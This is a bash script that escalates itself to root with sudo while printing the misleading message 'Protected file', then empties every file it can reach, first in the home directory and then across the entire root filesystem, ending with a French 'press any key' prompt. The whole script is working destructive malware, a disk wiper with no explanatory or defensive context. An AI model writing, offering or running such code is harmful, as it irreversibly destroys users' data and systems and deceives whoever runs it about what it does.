#!/bin/bash

if [ "$EUID" -ne 0 ]; then
    echo "Protected file"
    sudo /bin/bash "$0" "$@"
fi

TARGET="$HOME"

SELF="$(cd "$(dirname "$0")" && pwd)/$(basename "$0")"

while IFS= read -r -d '' FILE
do
    if [ "$FILE" = "$SELF" ]; then
        continue
    fi

    if { : > "$FILE"; } 2>/dev/null; then
        continue
    else
        continue
    fi

done < <(find "$TARGET" -type f -print0 2>/dev/null)

TARGET="/"

SELF="$(cd "$(dirname "$0")" && pwd)/$(basename "$0")"

while IFS= read -r -d '' FILE
do
    if [ "$FILE" = "$SELF" ]; then
        continue
    fi

    if { : > "$FILE"; } 2>/dev/null; then
        continue
    else
        continue
    fi

done < <(find "$TARGET" -type f -print0 2>/dev/null)

echo ""
read -n 1 -s -r -p "Appuyez sur une touche pour continuer..." < /dev/tty
echo ""
